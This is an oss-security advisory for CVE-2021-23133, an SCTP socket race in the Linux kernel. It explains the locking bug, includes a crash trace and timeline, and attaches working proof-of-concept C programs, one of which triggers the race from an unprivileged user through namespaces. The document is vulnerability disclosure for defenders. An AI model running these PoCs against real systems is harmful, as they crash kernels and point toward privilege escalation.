
List:       oss-security
Subject:    [oss-security] CVE-2021-23133: Linux kernel: race condition in sctp sockets
From:       Or Cohen <orcohen () paloaltonetworks ! com>
Date:       2021-04-18 8:41:06
Message-ID: CAM6JnLex-+TM+p5aNrcifxG3qmpL+gfXzSTzWpVpbj3_hsp_Fw () mail ! gmail ! com

Hello,

This is an announcement about CVE-2021-23133, a race condition
I found in the Linux kernel's sctp sockets (net/sctp/socket.c). It can lead to
kernel privilege escalation from the context of a network service, or from
an unprivileged process if certain conditions are met.

The bug was fixed on April 13, 2021:
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=b166a20b07382b8bc1dcee2a448715c9c2c81b5b


=*=*=*=*=*=*=*=*=   VULNERABILITY DETAILS - sctp_destroy_sock list_del race condition   =*=*=*=*=*=*=*=*=

All of the code figures below are from kernel version 5.11

The netns_sctp struct contains sctp-related information per network namespace;
one of its fields is the auto_asconf_splist list.
As the list can be accessed from multiple threads, every access to the list
should be protected by the addr_wq_lock spinlock.

(include/net/netns/sctp.h - netns_sctp structure)
...
    struct list_head addr_waitq;
    struct timer_list addr_wq_timer;
    struct list_head auto_asconf_splist;
    /* Lock that protects both addr_waitq and auto_asconf_splist */
    spinlock_t addr_wq_lock;
...

The sctp_sock struct contains the auto_asconf_list field which is used in order
to add elements to the auto_asconf_splist.

(include/net/sctp/structs.h - sctp_sock structure)
...
    struct list_head auto_asconf_list;
...

When an sctp socket is created, the sctp_init_sock function is called. After
setting up and initializing the sock structure, it executes the following code
at the end of the function:

(net/sctp/socket.c - sctp_init_sock function)
...
    if (net->sctp.default_auto_asconf) {
        spin_lock(&sock_net(sk)->sctp.addr_wq_lock);
        list_add_tail(&sp->auto_asconf_list,
            &net->sctp.auto_asconf_splist);
        sp->do_auto_asconf = 1;
        spin_unlock(&sock_net(sk)->sctp.addr_wq_lock);
    }
...

net->sctp.default_auto_asconf can be set to true by writing to the
sysctl "/proc/sys/net/sctp/default_auto_asconf", which is per
network namespace. If this variable is set, the socket is added to
the per network namespace auto_asconf_splist list and do_auto_asconf is set
to 1 in the socket.
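
Whether the current network namespace has this setting enabled can be checked
by reading the sysctl back. The following is a minimal sketch; the helper names
read_int_file and auto_asconf_enabled are made up for illustration, and the
file is assumed to hold a single integer.

```c
#include <assert.h>
#include <stdio.h>

/*
 * Reads one integer from a procfs-style file.
 * Returns 0 and stores the value in *out on success, -1 on failure.
 */
static int read_int_file(const char *path, int *out)
{
    assert(path && out);

    FILE *f = fopen(path, "r");
    if (!f)
        return -1;

    int ok = (fscanf(f, "%d", out) == 1);
    fclose(f);
    return ok ? 0 : -1;
}

/*
 * 1 = enabled, 0 = disabled, -1 = could not be determined
 * (for example because the file does not exist in this environment).
 */
static int auto_asconf_enabled(void)
{
    int v;

    if (read_int_file("/proc/sys/net/sctp/default_auto_asconf", &v) != 0)
        return -1;
    return v != 0;
}
```

A result of 1 only says that newly created sctp sockets in this namespace take
the list_add_tail path shown above; it does not say whether the kernel is patched.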

The bug lies in the sctp_destroy_sock function. This function assumes that
the addr_wq_lock is held whenever it is called, so it runs the
following code without any locking of its own:
...
    if (sp->do_auto_asconf) {
        sp->do_auto_asconf = 0;
        list_del(&sp->auto_asconf_list);
    }
...

However, there are 2 places in kernel code where sk_common_release (which
calls sctp_destroy_sock) is called without taking the lock:
1. In sctp_accept, if the sctp_sock_migrate function fails.
2. In inet_create or inet6_create, if there is a bpf program
   attached to BPF_CGROUP_INET_SOCK_CREATE which denies
   creation of the sctp socket.
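
The broken precondition can be modelled in user space. This is only a sketch
under stated assumptions: every name below (model_lock, model_sock,
model_destroy_sock, model_locked_path, model_error_path) is hypothetical, a
boolean stands in for the spinlock, and the check inside the destroy function
plays the role that a lock-held assertion would play in real code.

```c
#include <assert.h>
#include <stdbool.h>

/* Hypothetical user-space model; none of these names are kernel APIs. */
struct model_lock { bool held; };
struct model_sock { bool do_auto_asconf; bool on_list; };

/*
 * Models sctp_destroy_sock: it edits the shared list without taking the
 * lock itself, so it is only safe when the caller already holds it.
 * Returns 0 on success, -1 if it was reached without the lock.
 */
static int model_destroy_sock(struct model_lock *l, struct model_sock *sp)
{
    if (sp->do_auto_asconf) {
        if (!l->held)
            return -1;              /* unlocked list_del: the racy case */
        sp->do_auto_asconf = false;
        sp->on_list = false;
    }
    return 0;
}

/* Models a caller that takes the lock around the destroy call. */
static int model_locked_path(struct model_lock *l, struct model_sock *sp)
{
    assert(!l->held);               /* the modelled lock is not recursive */
    l->held = true;
    int ret = model_destroy_sock(l, sp);
    l->held = false;
    return ret;
}

/* Models the two error paths listed above, which call destroy directly. */
static int model_error_path(struct model_lock *l, struct model_sock *sp)
{
    return model_destroy_sock(l, sp);
}
```

In this model, model_error_path on a socket with do_auto_asconf set returns -1,
while model_locked_path on the same socket returns 0 and removes it from the list.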

=*=*=*=*=*=*=*=*=   TRIGGERING THE VULNERABILITY   =*=*=*=*=*=*=*=*=

I wrote a poc (sctp_race_priv_user.c) which triggers the vulnerability
via technique (2). The poc simply attaches a BPF_PROG_TYPE_CGROUP_SOCK
program to BPF_CGROUP_INET_SOCK_CREATE which denies creation of any socket,
and then runs 2 threads, each of which creates sctp sockets in a loop.
The race is then triggered and list_add corruption is detected in
sctp_init_sock. When running with CONFIG_DEBUG_LIST enabled, the kernel
crashes immediately.

The call stack is as follows:
...
[   69.693724] list_add corruption. prev->next should be next (ffffffff829fa980), but was dead000000000100. (prev=ffff8881079b8538).
[   69.694693] WARNING: CPU: 12 PID: 409 at lib/list_debug.c:28 __list_add_valid+0x4d/0x70
[   69.695345] Modules linked in:
[   69.695601] CPU: 12 PID: 409 Comm: test_sctp_race Not tainted 5.11.0 #74
[   69.696167] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[   69.696949] RIP: 0010:__list_add_valid+0x4d/0x70
[   69.697336] Code: c3 48 89 c1 48 c7 c7 10 97 59 82 e8 4d 4f c1 ff 0f 0b 31 c0 c3 48 89 d1 48 c7 c7 60 97 59 82 48 89 f2 48 89 c6 e8 33 4f c1 ff <0f> 0b 31 c0 c3 48 89 fe 48 89 c1 48 c7 c7 b0 97 59 82 e8 1c 4f c1
[   69.698864] RSP: 0018:ffffc90000647e48 EFLAGS: 00010282
[   69.699300] RAX: 0000000000000000 RBX: ffff8881079a8000 RCX: 0000000000000000
[   69.699903] RDX: ffff88842fd27860 RSI: ffff88842fd17a50 RDI: ffff88842fd17a50
[   69.700487] RBP: ffffffff829fa000 R08: 0000000000000003 R09: 0000000000000001
[   69.701086] R10: ffff888100c83a60 R11: ffffc90000647c58 R12: ffff8881079b8538
[   69.701688] R13: ffff8881079a8538 R14: ffffffff829fa980 R15: 0000000000000084
[   69.702273] FS:  00007f2fb82c7b40(0000) GS:ffff88842fd00000(0000) knlGS:0000000000000000
[   69.702950] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[   69.703426] CR2: 00007f2fb76bcff8 CR3: 0000000107960004 CR4: 00000000003706e0
[   69.704019] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[   69.704601] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[   69.705200] Call Trace:
[   69.705414]  sctp_init_sock+0x339/0x380
[   69.705759]  inet_create+0x1ac/0x350
[   69.706054]  __sock_create+0xfd/0x200
[   69.706365]  __sys_socket+0x55/0xd0
[   69.706674]  ? exit_to_user_mode_prepare+0x2f/0x120
[   69.707079]  __x64_sys_socket+0x11/0x20
[   69.707398]  do_syscall_64+0x33/0x40
[   69.707715]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[   69.708139] RIP: 0033:0x7f2fb77a7f17
...
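
The value dead000000000100 in the warning is the list poison that list_del
writes into a removed entry's next pointer. One interleaving that would leave
the list in the reported state can be replayed deterministically in user
space. The sketch below is my own reconstruction, not taken from the poc: it
assumes two sockets X and Y are on the list and that both are removed by
unlocked list_del calls that overlap. The helper names (del_load, del_unlink,
del_poison, replay_race) are hypothetical, and the poison constants are the
x86_64 values.

```c
#include <assert.h>
#include <stdint.h>

struct list_head { struct list_head *next, *prev; };

/* x86_64 poison values written by list_del(). */
#define LIST_POISON1 ((struct list_head *)(uintptr_t)0xdead000000000100ULL)
#define LIST_POISON2 ((struct list_head *)(uintptr_t)0xdead000000000122ULL)

/* list_del() split into phases so two deletions can be interleaved by hand. */
struct del_op { struct list_head *entry, *prev, *next; };

static struct del_op del_load(struct list_head *e)
{
    struct del_op op = { e, e->prev, e->next };   /* read both neighbours */
    return op;
}

static void del_unlink(struct del_op op)
{
    op.next->prev = op.prev;
    op.prev->next = op.next;
}

static void del_poison(struct del_op op)
{
    op.entry->next = LIST_POISON1;
    op.entry->prev = LIST_POISON2;
}

/* The two tests made when adding with list debugging; 0 means both pass. */
static int list_add_check(struct list_head *prev, struct list_head *next)
{
    if (next->prev != prev)
        return 1;                   /* "next->prev should be prev" */
    if (prev->next != next)
        return 2;                   /* "prev->next should be next" */
    return 0;
}

static void list_add_tail_plain(struct list_head *n, struct list_head *head)
{
    n->prev = head->prev;
    n->next = head;
    head->prev->next = n;
    head->prev = n;
}

/* Returns which check the next list_add_tail() would fail. */
static int replay_race(struct list_head **bad_next)
{
    struct list_head head = { &head, &head }, x, y;

    list_add_tail_plain(&x, &head);         /* thread A, under the lock */
    list_add_tail_plain(&y, &head);         /* thread B, under the lock */
    assert(list_add_check(head.prev, &head) == 0);

    struct del_op a = del_load(&x);         /* A: unlocked list_del(X) starts */
    struct del_op b = del_load(&y);         /* B: unlocked list_del(Y) starts */
    del_unlink(a);                          /* A: Y.prev = head, head.next = Y */
    del_unlink(b);                          /* B: head.prev = X, X.next = head */
    del_poison(a);                          /* A: X.next = LIST_POISON1 */
    del_poison(b);

    *bad_next = head.prev->next;            /* what the next add reads */
    return list_add_check(head.prev, &head);
}
```

In this replay the list head ends up pointing at the already removed X, so the
next insertion passes the next->prev test and fails the prev->next test with
the poison value, which is the shape of the warning above. Other interleavings
may well produce the same message.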

This specific poc (sctp_race_priv_user.c) requires the CAP_BPF and
CAP_NET_ADMIN capabilities in order to attach the bpf program.
According to https://lwn.net/Articles/820560/,
this is still considered a security boundary.
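
A process can inspect its own effective capabilities before trying to attach
the program. The sketch below parses the CapEff line of a
/proc/<pid>/status-style file. The bit numbers are those of
<linux/capability.h>; the helper names are hypothetical, the kernel_ge_5_8
flag must be supplied by the caller, and meets_poc_requirement is a literal
transcription of the requirement comment in the attached poc, not something
checked against the kernel sources.

```c
#include <assert.h>
#include <stdint.h>
#include <stdio.h>

/* Capability bit numbers from <linux/capability.h>. */
#define CAP_NET_ADMIN_BIT 12
#define CAP_SYS_ADMIN_BIT 21
#define CAP_BPF_BIT       39

/* Reads the "CapEff:" hex mask from a status file; 0 on success, -1 otherwise. */
static int read_cap_eff(const char *path, uint64_t *mask)
{
    char line[256];
    int ret = -1;

    FILE *f = fopen(path, "r");
    if (!f)
        return -1;

    while (fgets(line, sizeof(line), f)) {
        unsigned long long v;

        if (sscanf(line, "CapEff: %llx", &v) == 1) {
            *mask = v;
            ret = 0;
            break;
        }
    }
    fclose(f);
    return ret;
}

static int has_cap(uint64_t mask, int bit)
{
    assert(bit >= 0 && bit < 64);
    return (int)((mask >> bit) & 1);
}

/* Encodes the poc comment: >= 5.8 needs CAP_BPF + CAP_NET_ADMIN, older needs CAP_SYS_ADMIN. */
static int meets_poc_requirement(uint64_t mask, int kernel_ge_5_8)
{
    if (kernel_ge_5_8)
        return has_cap(mask, CAP_BPF_BIT) && has_cap(mask, CAP_NET_ADMIN_BIT);
    return has_cap(mask, CAP_SYS_ADMIN_BIT);
}
```

A typical call would be read_cap_eff("/proc/self/status", &mask) followed by
meets_poc_requirement(mask, 1) on a 5.8 or later kernel.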

=*=*=*=*=*=*=*=*=   TRIGGERING FROM UNPRIVILEGED USER  =*=*=*=*=*=*=*=*=

However, if a BPF_CGROUP_INET_SOCK_CREATE program is already attached,
such that an unprivileged user can make the creation of some sctp socket fail,
then the vulnerability can be triggered by an unprivileged user if unprivileged
user namespaces are enabled: create a new user and network namespace, set
"/proc/sys/net/sctp/default_auto_asconf" in the new network namespace,
and then race between the 2 threads.

This can be demonstrated by the following files:

1. load_bpf_prog.c - Which loads and attaches the BPF_CGROUP_INET_SOCK_CREATE
    program, and should be run from a privileged process.
2. sctp_race_unpriv_user.c - Which can be run from a regular, unprivileged
    user.

I haven't checked, but there are probably network security tools which attach
a bpf program to BPF_CGROUP_INET_SOCK_CREATE.

Regarding triggering via technique (1), which is failing sctp_sock_migrate in
sctp_accept: I tried many tricks to make sctp_sock_migrate fail,
but ultimately this requires failing some kmalloc or crypto calls,
which I couldn't do on a modern Ubuntu with almost the latest kernel.
However, it may be possible in older kernel versions, with
some other trick which I am not aware of, or if sctp_accept or
sctp_sock_migrate change in the future.

Note that by triggering via this technique, the vulnerability can be triggered
from an unprivileged user without the BPF_CGROUP_INET_SOCK_CREATE
program attached.

=*=*=*=*=*=*=*=*=    TIMELINE    =*=*=*=*=*=*=*=*=

2021-04-08: Bug reported to security () kernel org and linux-distros () vs openwall org
2021-04-13: Patch submitted to netdev
2021-04-17: Patch committed to mainline kernel
2021-04-18: Public announcement

=*=*=*=*=*=*=*=*=     CREDIT     =*=*=*=*=*=*=*=*=

Or Cohen
Palo Alto Networks


["sctp_race_priv_user.c" (application/octet-stream)]

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <stddef.h>
#include <string.h>
#include <unistd.h>
#include <assert.h>
#include <errno.h>
#include <fcntl.h>
#include <net/if.h>
#include <inttypes.h>
#include <linux/bpf.h>
#include <bpf/bpf.h>
#include "bpf_insn.h"
#include <sched.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <linux/if_packet.h>
#include <net/ethernet.h>
#include <arpa/inet.h>
#include <sys/stat.h>
#include <stdbool.h>
#include <stdarg.h>
#include <stdint.h>
#include <sys/mman.h>
#include <pthread.h>
#include <sys/time.h>
#include <sys/resource.h>

#define SCTP_AUTO_ASCONF       30
#define SOL_SCTP	132

char bpf_log_buf[BPF_LOG_BUF_SIZE];

static int prog_load(__u32 idx, __u32 mark, __u32 prio)
{
	struct bpf_insn prog_start[] = {
		BPF_MOV64_REG(BPF_REG_6, BPF_REG_1),
	};
	struct bpf_insn prog_end[] = {
		BPF_MOV64_IMM(BPF_REG_0, 0), /* r0 = verdict */
		BPF_EXIT_INSN(),
	};

	struct bpf_insn *prog;
	size_t insns_cnt;
	void *p;
	int ret;

	insns_cnt = sizeof(prog_start) + sizeof(prog_end);

	p = prog = malloc(insns_cnt);
	if (!prog) {
		fprintf(stderr, "Failed to allocate memory for instructions\n");
		return -1; /* negative, so the caller's prog_fd < 0 check sees the failure */
	}

	memcpy(p, prog_start, sizeof(prog_start));
	p += sizeof(prog_start);

	memcpy(p, prog_end, sizeof(prog_end));
	p += sizeof(prog_end);

	insns_cnt /= sizeof(struct bpf_insn);

	ret = bpf_load_program(BPF_PROG_TYPE_CGROUP_SOCK, prog, insns_cnt,
				"GPL", 0, bpf_log_buf, BPF_LOG_BUF_SIZE);

	free(prog);

	return ret;
}

void * create_sock_thread_function(void *arg)
{
    while(1)
    {
        int s1 = socket(AF_INET, SOCK_SEQPACKET, IPPROTO_SCTP);
        if(s1 >= 0) /* 0 is also a valid descriptor */
        {
            printf("This should not happen!!!!\n");
            close(s1);
        }
    }
    return NULL;
}

static bool write_file(const char* file, const char* what, ...)
{
	char buf[1024];
	va_list args;
	va_start(args, what);
	vsnprintf(buf, sizeof(buf), what, args);
	va_end(args);
	buf[sizeof(buf) - 1] = 0;
	int len = strlen(buf);

	int fd = open(file, O_WRONLY | O_CLOEXEC);
	if (fd == -1)
		return false;
	if (write(fd, buf, len) != len) {
		close(fd);
		return false;
	}
	close(fd);
	return true;
}


bool set_default_auto_asconf()
{
    if (!write_file("/proc/sys/net/sctp/default_auto_asconf", "1"))
    {
        perror("Failed to write to default_auto_asconf");
        return false;
    }
    return true;
}


/*
    Required capabilities:

        kernel >= 5.8 -
            CAP_BPF, CAP_NET_ADMIN

        kernel < 5.8 -
            CAP_SYS_ADMIN
    
*/
int main(int argc, char **argv)
{
    printf("sctp race poc - privileged user\n");
    char* cgrp_path;
    if (argv[1])
    {
        cgrp_path = argv[1];
    }
    else
    {
        cgrp_path = "/sys/fs/cgroup/unified";
    }

    int cg_fd = open(cgrp_path, O_DIRECTORY | O_RDONLY);
    if (cg_fd < 0)
    {
        printf("Failed to open cgroup path: '%s'\n", strerror(errno));
        return EXIT_FAILURE;
    }
    printf("Opened cgroup path =  %s\n", cgrp_path);

    if (!set_default_auto_asconf())
    {
        return EXIT_FAILURE;
    }

    printf("Successfully enabled /proc/sys/net/sctp/default_auto_asconf\n");

    int prog_fd = prog_load(0, 0, 0);
    if (prog_fd < 0)
    {
        perror("prog_load failed");
        return EXIT_FAILURE;
    }

    printf("Successfully loaded a BPF_PROG_TYPE_CGROUP_SOCK program\n");

    int ret = bpf_prog_attach(prog_fd, cg_fd,
                              BPF_CGROUP_INET_SOCK_CREATE, 0);
    if (ret < 0)
    {
        printf("Failed to attach prog to cgroup: '%s'\n",
               strerror(errno));
        return EXIT_FAILURE;
    }
    printf("Successfully attached the program to BPF_CGROUP_INET_SOCK_CREATE\n");

    sleep(1);

    pthread_t create_sock_thread;
    int err = pthread_create(&create_sock_thread,
                             NULL,
                             create_sock_thread_function,
                             NULL);
    if (err)
    {
        /* pthread_create returns the error code; it does not set errno */
        printf("pthread_create failed with error =  '%s'\n",
               strerror(err));
        return EXIT_FAILURE;
    }

    printf("Kernel should crash soon.. (if CONFIG_DEBUG_LIST is enabled)\n");
    create_sock_thread_function(NULL);
    return 0;
}

["sctp_race_unpriv_user.c" (application/octet-stream)]

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <stddef.h>
#include <string.h>
#include <unistd.h>
#include <assert.h>
#include <errno.h>
#include <fcntl.h>
#include <net/if.h>
#include <inttypes.h>
#include <linux/bpf.h>
#include <sched.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <linux/if_packet.h>
#include <net/ethernet.h>
#include <arpa/inet.h>
#include <sys/stat.h>
#include <stdbool.h>
#include <stdarg.h>
#include <stdint.h>
#include <sys/mman.h>
#include <pthread.h>
#include <sys/time.h>
#include <sys/resource.h>

#define SCTP_AUTO_ASCONF       30
#define SOL_SCTP	132

void * create_sock_thread_function(void *arg)
{
    while(1)
    {
        int s1 = socket(AF_INET, SOCK_SEQPACKET, IPPROTO_SCTP);
        if(s1 >= 0) /* 0 is also a valid descriptor */
        {
            printf("This should not happen!!!!\n");
            close(s1);
        }
    }
    return NULL;
}

static bool write_file(const char* file, const char* what, ...)
{
	char buf[1024];
	va_list args;
	va_start(args, what);
	vsnprintf(buf, sizeof(buf), what, args);
	va_end(args);
	buf[sizeof(buf) - 1] = 0;
	int len = strlen(buf);

	int fd = open(file, O_WRONLY | O_CLOEXEC);
	if (fd == -1)
		return false;
	if (write(fd, buf, len) != len) {
		close(fd);
		return false;
	}
	close(fd);
	return true;
}


bool set_default_auto_asconf()
{
    if (!write_file("/proc/sys/net/sctp/default_auto_asconf", "1"))
    {
        perror("Failed to write to default_auto_asconf");
        return false;
    }
    return true;
}


void setup_sandbox()
{
    /* Record the ids before entering the new user namespace */
    int real_uid = getuid();
    int real_gid = getgid();

    if (unshare(CLONE_NEWUSER) != 0)
    {
        perror("unshare(CLONE_NEWUSER)");
        exit(EXIT_FAILURE);
    }

    if (unshare(CLONE_NEWNET) != 0)
    {
        perror("unshare(CLONE_NEWNET)");
        exit(EXIT_FAILURE);
    }

    /* setgroups must be denied before an unprivileged process may write gid_map */
    if (!write_file("/proc/self/setgroups", "deny"))
    {
        perror("write_file(/proc/self/setgroups)");
        exit(EXIT_FAILURE);
    }

    /* Map the original uid and gid to 0 inside the new namespace */
    if (!write_file("/proc/self/uid_map", "0 %d 1\n", real_uid))
    {
        perror("write_file(/proc/self/uid_map)");
        exit(EXIT_FAILURE);
    }

    if (!write_file("/proc/self/gid_map", "0 %d 1\n", real_gid))
    {
        perror("write_file(/proc/self/gid_map)");
        exit(EXIT_FAILURE);
    }
}


/*
    NOTE::
    This specific poc of the vulnerability assumes that a BPF_CGROUP_INET_SOCK_CREATE
    program was already loaded and that it rejects creation of sctp sockets.

    Compile with:
        gcc sctp_race_unpriv_user.c -lpthread
*/
int main(int argc, char **argv)
{
    printf("sctp race poc - unprivileged user\n");
    printf("uid = %d\n", getuid());

    printf("Trying to create a new user and network namespace\n");

    setup_sandbox();

    printf("Running in a new user and network namespace\n");

    if (!set_default_auto_asconf())
    {
        return EXIT_FAILURE;
    }

    printf("Successfully enabled default_auto_asconf in a new network namespace\n");

    pthread_t create_sock_thread;
    int err = pthread_create(&create_sock_thread,
                             NULL,
                             create_sock_thread_function,
                             NULL);
    if (err)
    {
        /* pthread_create returns the error code; it does not set errno */
        printf("pthread_create failed with error =  '%s'\n",
               strerror(err));
        return EXIT_FAILURE;
    }

    printf("Kernel should crash soon.. (if CONFIG_DEBUG_LIST is enabled)\n");
    create_sock_thread_function(NULL);
    return 0;
}

["load_bpf_prog.c" (application/octet-stream)]

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <stddef.h>
#include <string.h>
#include <unistd.h>
#include <assert.h>
#include <errno.h>
#include <fcntl.h>
#include <net/if.h>
#include <inttypes.h>
#include <linux/bpf.h>
#include <bpf/bpf.h>
#include "bpf_insn.h"
#include <sched.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <linux/if_packet.h>
#include <net/ethernet.h>
#include <arpa/inet.h>
#include <sys/stat.h>
#include <stdbool.h>
#include <stdarg.h>
#include <stdint.h>
#include <sys/mman.h>
#include <pthread.h>
#include <sys/time.h>
#include <sys/resource.h>

char bpf_log_buf[BPF_LOG_BUF_SIZE];

static int prog_load(__u32 idx, __u32 mark, __u32 prio)
{
	struct bpf_insn prog_start[] = {
		BPF_MOV64_REG(BPF_REG_6, BPF_REG_1),
	};
	struct bpf_insn prog_end[] = {
		BPF_MOV64_IMM(BPF_REG_0, 0), /* r0 = verdict */
		BPF_EXIT_INSN(),
	};

	struct bpf_insn *prog;
	size_t insns_cnt;
	void *p;
	int ret;

	insns_cnt = sizeof(prog_start) + sizeof(prog_end);

	p = prog = malloc(insns_cnt);
	if (!prog) {
		fprintf(stderr, "Failed to allocate memory for instructions\n");
		return -1; /* negative, so the caller's prog_fd < 0 check sees the failure */
	}

	memcpy(p, prog_start, sizeof(prog_start));
	p += sizeof(prog_start);

	memcpy(p, prog_end, sizeof(prog_end));
	p += sizeof(prog_end);

	insns_cnt /= sizeof(struct bpf_insn);

	ret = bpf_load_program(BPF_PROG_TYPE_CGROUP_SOCK, prog, insns_cnt,
				"GPL", 0, bpf_log_buf, BPF_LOG_BUF_SIZE);

	free(prog);

	return ret;
}

int main(int argc, char **argv)
{
    char* cgrp_path;
    if (argv[1])
    {
        cgrp_path = argv[1];
    }
    else
    {
        cgrp_path = "/sys/fs/cgroup/unified";
    }

    int cg_fd = open(cgrp_path, O_DIRECTORY | O_RDONLY);
    if (cg_fd < 0)
    {
        printf("Failed to open cgroup path: '%s'\n", strerror(errno));
        return EXIT_FAILURE;
    }
    printf("Opened cgroup path =  %s\n", cgrp_path);

    int prog_fd = prog_load(0, 0, 0);
    if (prog_fd < 0)
    {
        perror("prog_load failed");
        return EXIT_FAILURE;
    }

    printf("Successfully loaded a BPF_PROG_TYPE_CGROUP_SOCK program\n");

    int ret = bpf_prog_attach(prog_fd, cg_fd,
                              BPF_CGROUP_INET_SOCK_CREATE, 0);
    if (ret < 0)
    {
        printf("Failed to attach prog to cgroup: '%s'\n",
               strerror(errno));
        return EXIT_FAILURE;
    }
    printf("Successfully attached the program to BPF_CGROUP_INET_SOCK_CREATE\n");
    return 0;
}

